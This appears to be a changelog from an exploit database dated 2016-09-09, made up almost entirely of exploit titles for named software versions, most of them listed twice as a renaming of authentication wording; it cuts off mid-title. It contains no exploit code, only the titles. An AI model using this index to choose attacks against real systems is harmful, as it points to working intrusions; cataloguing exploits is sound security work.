DB: 2016-09-09
11 new exploits Samba 3.0.4 - SWAT Authorization Buffer Overflow Samba 3.0.4 SWAT - Authorisation Buffer Overflow Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2) HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit) HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit) WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC) WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC) FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service Multiple Applications - Local Credentials Disclosure Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2) Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2) IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC) Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC) Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC) Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer 
Overflow (PoC) Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC) Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC) SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC) MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow Joomla Component JPad 1.0 - Post-Authentication SQL Injection Joomla Component JPad 1.0 - Authenticated SQL Injection CMS Made Simple 1.2.4 - (FileManager module) File Upload CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication) freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated) freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit Debian OpenSSH - (Authenticated) 
Remote SELinux Privilege Elevation Exploit Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection AvailScript Jobs Portal Script - (Post-Authentication) File Upload AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service Serv-U 7.3 - (Authenticated) Remote FTP File Replacement Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC) Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC AJ Auction Authentication - Bypass Exploit AJ Auction - Authentication Bypass Simple Directory Listing 2 - Cross-Site File Upload Simple Directory Listing 2 - Cross-Site Arbitrary File Upload Mini File Host 1.x - Arbitrary PHP File Upload Mini File Host 1.x - Arbitrary .PHP File Upload Memberkit 1.0 - Remote PHP File Upload Memberkit 1.0 - Remote Arbitrary .PHP File Upload WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow Coppermine Photo Gallery 1.4.19 - Remote 
PHP File Upload Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC) Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC) WikkiTikkiTavi 1.11 - Remote PHP File Upload WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation zFeeder 1.6 - 'admin.php' Pre-Authentication zFeeder 1.6 - 'admin.php' Unauthenticated Addonics NAS Adapter - Post-Authentication Denial of Service Addonics NAS Adapter - Authenticated Denial of Service Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service Hannon Hill Cascade Server - (Post-Authentication) Command Execution Hannon Hill Cascade Server - (Authenticated) Command Execution Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC) XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC) Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC MySQL 5.0.45 - (Authenticated) 
COM_CREATE_DB Format String PoC Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal Adobe JRun 4 - (logfile) Authenticated Directory Traversal FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service NetAccess IP3 - (Post-Authentication) (ping option) Command Injection NetAccess IP3 - (Authenticated) (ping option) Command Injection Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC) httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC) Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC) Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC) Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC) httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC) httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC) Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of 
Service (PoC) Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit) eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC) eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2) uTorrent WebUI 0.370 - Authorization header Denial of Service uTorrent WebUI 0.370 - Authorisation Header Denial of Service Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass) ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass) Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass) BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass) dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting) dotDefender 3.8-5 - Unauthenticated Remote Code 
Execution (via Cross-Site Scripting) Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit) Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit) UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow Achievo 1.4.3 - Multiple Authorization Flaws Achievo 1.4.3 - Multiple Authorisation Flaws PHPMotion 1.62 - 'FCKeditor' File Upload PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal Home FTP Server 1.11.1.149 - Authenticated Directory Traversal News Script PHP Pro - 'FCKeditor' File Upload News Script PHP Pro - 'FCKeditor' Arbitrary File Upload Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack 
Buffer Overflow HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow MailEnable - Authorization Header Buffer Overflow MailEnable - Authorisation Header Buffer Overflow ColdFusion 8.0.1 - Arbitrary File Upload and Execution Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution ColdFusion 8.0.1 - Arbitrary File Upload / Execution Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution OpenX - banner-edit.php File Upload PHP Code Execution OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution Joomla 1.5.12 - tinybrowser File Upload Code Execution Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit If-CMS 2.07 - Pre-Authentication Local File Inclusion (1) If-CMS 2.07 - Unauthenticated Local File Inclusion (1) IPComp - encapsulation Pre-Authentication kernel memory Corruption IPComp - encapsulation Unauthenticated kernel memory Corruption SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass) Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass) Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow ActFax Server FTP - (Authenticated) Remote Buffer Overflow If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2) If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass) DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit DVD X Player 5.5 Pro - (SEH + ASLR + DEP 
Bypass) Exploit TomatoCart 1.1 - Post-Authentication Local File Inclusion TomatoCart 1.1 - Authenticated Local File Inclusion BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass QuiXplorer 2.3 - Bugtraq File Upload QuiXplorer 2.3 - Bugtraq Arbitrary File Upload QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit) QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit) Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter) Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter) BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection Dolibarr ERP & CRM 3 - Authenticated OS Command Injection V-CMS - PHP File Upload and Execution V-CMS - Arbitrary .PHP File Upload / Execution WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection WebCalendar 1.2.4 - Unauthenticated Remote Code Injection appRain CMF - Arbitrary PHP File Upload appRain CMF - Arbitrary .PHP File Upload EGallery - PHP File Upload EGallery - Arbitrary .PHP File Upload SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary .PHP File Upload WebPageTest - Arbitrary PHP File Upload WebPageTest - Arbitrary .PHP File Upload XODA 
0.4.5 - Arbitrary PHP File Upload XODA 0.4.5 - Arbitrary .PHP File Upload Elcom CMS 7.4.10 - Community Manager Insecure File Upload Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1) OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2) Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1) Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit qdPM 7.0 - Arbitrary PHP File Upload qdPM 7.0 - Arbitrary .PHP File Upload Oracle Database - Authentication Protocol Security Bypass Oracle Database - Protocol Authentication Bypass Mod_NTLM 0.x - Authorization Heap Overflow Mod_NTLM 0.x - Authorisation Heap Overflow Mod_NTLM 0.x - Authorization Format String Mod_NTLM 0.x - Authorisation Format String Geeklog 1.3.x - Authentication SQL Injection Geeklog 1.3.x - Authenticated SQL Injection NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution MySQL - Remote Pre-Authentication User Enumeration MySQL - Remote Unauthenticated User Enumeration vbPortal 2.0 alpha 8.1 - Authentication SQL Injection vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1) DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2) DameWare Mini Remote Control Server 3.7x - 
Pre-Authentication Buffer Overflow (3) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3) WordPress WP-Property Plugin - PHP File Upload WordPress Asset-Manager Plugin - PHP File Upload WordPress WP-Property Plugin - Arbitrary .PHP File Upload WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2) Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun Novell NCP - Pre-Authentication Remote Root Exploit Novell NCP - Unauthenticated Remote Root Exploit Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass Polar Helpdesk 3.0 - Cookie Based Authentication Bypass IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution IRIS Citations Management Tool - (Authenticated) Remote Command Execution Polycom HDX - Telnet Authorization Bypass (Metasploit) Polycom HDX - Telnet Authentication Bypass (Metasploit) OpenEMR - 
PHP File Upload OpenEMR - Arbitrary .PHP File Upload PolarPearCMS - PHP File Upload PolarPearCMS - Arbitrary .PHP File Upload Apache 2.0.x - mod_ssl Remote Denial of Service Apache/mod_ssl 2.0.x - Remote Denial of Service phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal MoinMoin - twikidraw Action Traversal File Upload MoinMoin - twikidraw Action Traversal Arbitrary File Upload Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow FlexWATCH 3.0 - AIndex.asp Authorization Bypass FlexWATCH 3.0 - AIndex.asp Authentication Bypass HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload WordPress Curvo Themes - Cross-Site Request Forgery File Upload WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass PHPBB2 - Admin_Ug_Auth.php Administrative Bypass Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass Castripper 2.50.70 - 
'.pls' DEP Exploit Castripper 2.50.70 - '.pls' DEP Bypass Exploit Google Urchin 5.7.3 - Report.cgi Authorization Bypass Google Urchin 5.7.3 - Report.cgi Authentication Bypass Adobe Flash - Method Calls Use-After-Free Adobe Flash - Transform.colorTranform Getter Info Leak RSA Authentication Agent for Web 5.3 - URI redirection RSA Authentication Agent for Web 5.3 - URI Redirection Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow Zabbix 2.0 - 3.0.3 - SQL Injection ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload Katello (Red Hat Satellite) - users/update_roles Missing Authorization Katello (Red Hat Satellite) - users/update_roles Missing Authorisation Freepbx 13.0.x < 13.0.154 - Remote Command Execution FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution Jobberbase 2.0 - Multiple Vulnerabilities Windows x86 - Bind Shell TCP Shellcode WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution Moab < 7.2.9 - Authorization Bypass Moab < 7.2.9 - Authentication Bypass Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection 
Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection Drupal Core < 7.32 - Pre-Authentication SQL Injection Drupal Core < 7.32 - Unauthenticated SQL Injection Tincd - Post-Authentication Remote TCP Stack Buffer Overflow Tincd - Authenticated Remote TCP Stack Buffer Overflow PMB 4.1.3 - Post-Authentication SQL Injection PMB 4.1.3 - Authenticated SQL Injection Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution ManageEngine Multiple Products - Authenticated File Upload ManageEngine Multiple Products - Authenticated Arbitrary File Upload Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass) Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass) Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection Symantec Web Gateway 5 - restore.php Authenticated Command Injection JBoss Seam 2 - Arbitrary File Upload and Execution JBoss Seam 2 - Arbitrary File Upload / Execution Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit) Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload / Execution JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass JibberBook 2.3 
- 'Login_form.php' Authentication Bypass Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution Zenoss 3.2.1 - Remote Post-Authentication Command Execution Zenoss 3.2.1 - Remote Authenticated Command Execution Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution Magento CE < 1.9.0.1 - Authenticated Remote Code Execution Netsweeper 4.0.9 - Arbitrary File Upload and Execution Netsweeper 4.0.9 - Arbitrary File Upload / Execution Netsweeper 4.0.8 - Arbitrary File Upload and Execution Netsweeper 4.0.8 - Arbitrary File Upload / Execution EasyITSP - 'customers_edit.php' Authentication Security Bypass EasyITSP - 'customers_edit.php' Authentication Bypass Wolf CMS - Arbitrary File Upload and Execution Wolf CMS - Arbitrary File Upload / Execution Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow GLPI 0.85.5 - Remote Code Execution (via File 